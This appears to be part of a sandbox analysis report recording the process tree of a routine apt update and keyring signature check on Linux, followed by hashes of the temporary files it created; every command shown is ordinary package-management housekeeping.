- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1965
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1967
- /bin/cp
  cp -a /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.orig.gpg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1968
- /usr/bin/gpgv
  gpgv --homedir /tmp/apt-key-gpghome.PUWKEmdlgl --keyring /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.BT4hCo /tmp/apt.data.lfc2h1
  2⤵
  PID:1975
- /usr/bin/gpgconf
  gpgconf --kill all
  2⤵
  PID:1976
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart KILLAGENT
    3⤵
    PID:1977
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
    3⤵
    PID:1978
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
    3⤵
    PID:1979
- /bin/rm
  rm -rf /tmp/apt-key-gpghome.PUWKEmdlgl
  2⤵
  PID:1980

/usr/bin/sort
sort
1⤵
PID:1955

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1971

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1974

/bin/sh
sh -c "touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true"
1⤵
PID:1982
- /usr/bin/touch
  touch /var/lib/apt/periodic/update-success-stamp
  2⤵
  PID:1983

/bin/sh
sh -c "[ ! -f /var/run/dbus/system_bus_socket ] || /usr/bin/dbus-send --system --dest=org.debian.apt --type=signal /org/debian/apt org.debian.apt.CacheChanged || true"
1⤵
PID:1984

/bin/sh
sh -c "/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null"
1⤵
PID:1985

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/apt-key-gpghome.Dy6P39OCwo/gpg.1.sh

Filesize
82B

MD5
403a4592b82d52a228ca10bed2201abc

SHA1
db160c47ed228350fa98b455e69fa02f5f91962c

SHA256
d5d5696d70f2da5bf739adcdbd225a13a07533d6bd936aaaf246387d56f02d9a

SHA512
4e54ce7dc402757af5c342358922edfd2dcc3892fbe04fb8a44b267169bceadb57b511b34fe2c8b96ba838d455d5b06e8a65abd778b08760bee3836e1333e924

Download Submit
/tmp/apt-key-gpghome.PUWKEmdlgl/gpg.1.sh

Filesize
82B

MD5
b0d16da085e293d5d8c5f582e8f156e3

SHA1
59e10f99212483f624727be2fa9d3afc68e3486a

SHA256
4aeeb9c248aa4476f6bb319b45431cb270fd3120a63a15147116959d082920f2

SHA512
1a7a1278d88a7b6f7bf338dda4ed156b23062be48b107369ebfc87f63f4a633e9c8a9a592846afd495bc268de6fbbf73e9c8391d15e8d0475f8e5fe9179491f7

Download Submit
/tmp/apt-key-gpghome.lP3aH5RXO8/gpg.1.sh

Filesize
82B

MD5
cb8e8f56a0d49d6f8a7ad8c795f596f4

SHA1
f18ae53a8e0c4e0da9bc80a1a5b59d8356e789ae

SHA256
339ad0c85d47f1e1c56c6260bfcfce8e0278e9d276c59412eba3116cc83f69ec

SHA512
f652d8513e8621707acab2b459fecb71deb9609772d0809a234758ce12ce74a59ab1a8e3e523fa1f078a336dc01e7d74e1d155e9d16430d693fde8a4c99dfbee

Download Submit
/tmp/apt-key-gpghome.o5POtCtfqs/gpg.1.sh

Filesize
82B

MD5
b591c1d33b54b65eeac2381d7c36886a

SHA1
e28b9336eca298cf906eeb278f464b7b1d7e8d3e

SHA256
a2e0fe3ae466856476c34f437c2ed30e60ce345102be2ac9929486f632ae5f8f

SHA512
1ea555ca561598e6d4104261b42315f3c4ea6b243bc0ac0c71af758391b5ddc70f6b6eff46ad54498e9d098b965a04387434d062e0029e2b5ce50871dbea7309

Download Submit
/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg

Filesize
7KB

MD5
b3bf35c5e796db394a50f96b908b690f

SHA1
b1e90de4d9d88bac6c67926c0ff6263e3ef7c2d2

SHA256
cf419d6c58bea5f2586043ecbad4c44f27d6f6060e5be19993b857105a5be094

SHA512
a97f8881c83ddc681623e4f503f8f758afe85ae6c34e2339a635e9521ae1303aebb90a6bef7c1136b6bd2b7418facacf98643f24e8bb40f1f93fb8a8ef714a96

Download Submit
/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg

Filesize
2KB

MD5
79650cd189f35a29603fc43202d399ad

SHA1
e3bdd5aec56b59d5eaff3f60caf46a6786fc7ff8

SHA256
5321d780da31a1fa35c044470ef849a2f6244048855fdc4c22e527b6366a0ef7

SHA512
34bad6f9713c5837d3139dcb3a49239373fe5c242f31c3ca539888d16c2d5e63074c806e700553bdf9b6879e3c2b48c835a900df4ff8dfa96afd041d2357733e

Download Submit
/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg

Filesize
5KB

MD5
34aa70714b28c0918716b6ce3bdb945e

SHA1
5c7cd1296bc98e2ea0e221beb45f8cbe65dd3016

SHA256
30ffc1b01e43be791a595d5125e9ce283b206ca8dd299ea2149ee01d7a39895e

SHA512
f06340e985e01e7aa3a03dc662f4a084c835f0a39e3af40616851d80bfc5948786cf10a403811fb5c46a98f949e7cfdfc1bb481a5bdfda9376812566dc55140d

Download Submit
/tmp/apt.conf.g9ukqV

Filesize
13KB

MD5
a76061c3ab255e6b8d43815d276645be

SHA1
1efc38e5870ed9949fff954f47719fa8da39a70e

SHA256
9f3c5a98f42457279978d5c118a086b807967da9c9e9d8035a373a5df2d65288

SHA512
507182a74e6b4b5c25fb0741f6340aa5b8c752f41e0b3d0a8516349ae920f89f09fa2cb0a176fa66723d30500b2db6e91fa49ba97a69a18db8a1315434e93b40

Download Submit
/tmp/apt.data.73Fbeh

Filesize
85KB

MD5
1ee010b9e38ce7b0e70d0dfac2432a4d

SHA1
b5c03f220b5d0eece5da779b22b45763ac3f6fb5

SHA256
a148097b718116bec532f9b29d7cc18aaf0fb279c7d85091aa53a6e73be8863d

SHA512
aa79f520dac67935dd65ed5b1a1375d14df6e9f87a2860f5c581fc03a402f81aee9e1cdcb19bb611838568f1cf47ddcc053f41ed15f473a6bb7ffd055849d5eb

Download Submit
/tmp/apt.sig.XyhbkB

Filesize
833B

MD5
505ad9cd17d5c5c86e48ebbcbe5a259a

SHA1
d3e0b35b616a911dad7e1e78739d34e2b779f3e4

SHA256
6311ed6f53ffdfbd0c9599216285e5b5e1d4c74af4fa070c8779313aa0a839e0

SHA512
aed9d837ffda0ddd33357a96722bf896b155394c8bcf183f9b9d1485f548e11304acaa35edf06121bd04a010dfe2fccfb6d9e8d39e5f166af83beb2488753d0b

Download Submit
/tmp/fileutl.message.c0t5Gs

Filesize
180KB

MD5
36c4be31b7662eadfa1132e3ec2e2586

SHA1
e67d5569615386744405b7eb29ea0b0208ad3bd6

SHA256
9fb26a1277a567b5f604484ec506a363091b148570c0e522487aa4af4a9a796d

SHA512
3d546bfd46566f86b40d25b8b126b836c3ed0da22e4bfda88148a98ab48d596f0a644f3b1e49c23f4bf05e2448452b961a65bf26896c9850331144d48d68b184

Download Submit